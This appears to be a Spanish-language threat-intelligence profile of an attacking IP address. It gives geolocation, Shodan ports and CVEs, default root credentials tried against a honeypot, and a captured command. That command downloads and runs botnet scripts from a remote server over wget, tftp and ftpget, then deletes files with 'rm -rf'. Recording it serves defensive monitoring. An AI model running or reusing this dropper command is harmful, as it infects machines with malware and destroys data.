Amenaza Activa • BAJO

192.227.210.142

Pais de Origen🇺🇸 Estados Unidos

Primera Deteccion1/5/2026

Ultima Actividad1/5/2026

ISPHostPapa

🎯

Ataques Totales

🔌

Puertos

📡

Tipos Ataque

🦠

Malware

Geolocalizacion

Pais: 🇺🇸 Estados Unidos
Ciudad: Buffalo
ASN: AS36352
ISP: HostPapa

Tipos de Ataque

ssh_telnet_honeypot

Puertos Atacados

Malware Asociado

a469ac283e9c2e604a60...→

Credenciales Intentadas

🔐root/root

🔐root/user

🔐root/toor

🔐root/guest

🔐root/admin

Comandos Ejecutados

cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.206.225.136/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 5.206.225.136 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 5.206.225.136; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 5.206.225.136 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; exit

$sh1x

Exposicion segun Shodan InternetDBShodan

Datos de InternetDB, actualizacion no en tiempo real

Puertos

44362349152

Vulnerabilidades

CVE-2013-1427CVE-2015-3200CVE-2018-19052CVE-2010-0295CVE-2014-2323CVE-2013-4560CVE-2013-4559CVE-2019-11072CVE-2014-2324CVE-2011-4362

Hostnames

192-227-210-142-host.colocrossing.com

CPEs

cpe:/a:lighttpd:lighttpd:1.4.23

Evaluacion de Riesgo

/100

BajoMedioAltoCritico